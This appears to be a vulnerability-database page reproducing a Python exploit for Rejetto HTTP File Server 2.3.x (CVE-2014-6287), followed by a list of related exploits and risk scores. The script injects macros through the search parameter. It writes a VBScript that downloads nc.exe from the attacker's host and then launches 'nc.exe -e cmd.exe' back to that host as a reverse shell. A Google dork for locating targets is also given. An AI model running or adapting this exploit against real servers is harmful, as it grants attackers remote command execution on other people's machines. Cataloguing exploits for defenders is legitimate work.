Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)

🗓️ 04 Jan 2016 00:00:00Reported by Avinash ThapaType

exploitdb🔗 www.exploit-db.com👁 1316 Views

Rejetto HTTP File Server (HFS) 2.3.x allows remote command execution via HTTP request vulnerability

Reporter	Title	Published	Views	Family All 42
GithubExploit	Exploit for Code Injection in Rejetto Http_File_Server	25 Jan 202622:51	–	githubexploit
GithubExploit	Exploit for Code Injection in Rejetto Http_File_Server	16 May 202623:24	–	githubexploit
GithubExploit	Exploit for Code Injection in Rejetto Http_File_Server	10 Mar 202615:31	–	githubexploit
GithubExploit	Exploit for Code Injection in Rejetto Http_File_Server	16 Sep 202517:44	–	githubexploit
0day.today	HttpFileServer 2.3.x Remote Command Execution Vulnerability	13 Sep 201400:00	–	zdt
0day.today	Rejetto HttpFileServer Remote Command Execution Exploit	9 Oct 201400:00	–	zdt
0day.today	Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)	4 Jan 201600:00	–	zdt
0day.today	HFS Http File Server 2.3.x - Remote Command Execution Exploit (3)	23 Feb 202100:00	–	zdt
ATTACKERKB	CVE-2014-6287	7 Oct 201400:00	–	attackerkb
Circl	CVE-2014-6287	15 Sep 201400:00	–	circl

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "192.168.44.128" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""

04 Jan 2016 00:00Current

9.5High risk

Vulners AI Score9.5

CVSS 3.19.8

CVSS 210

EPSS0.94361

SSVC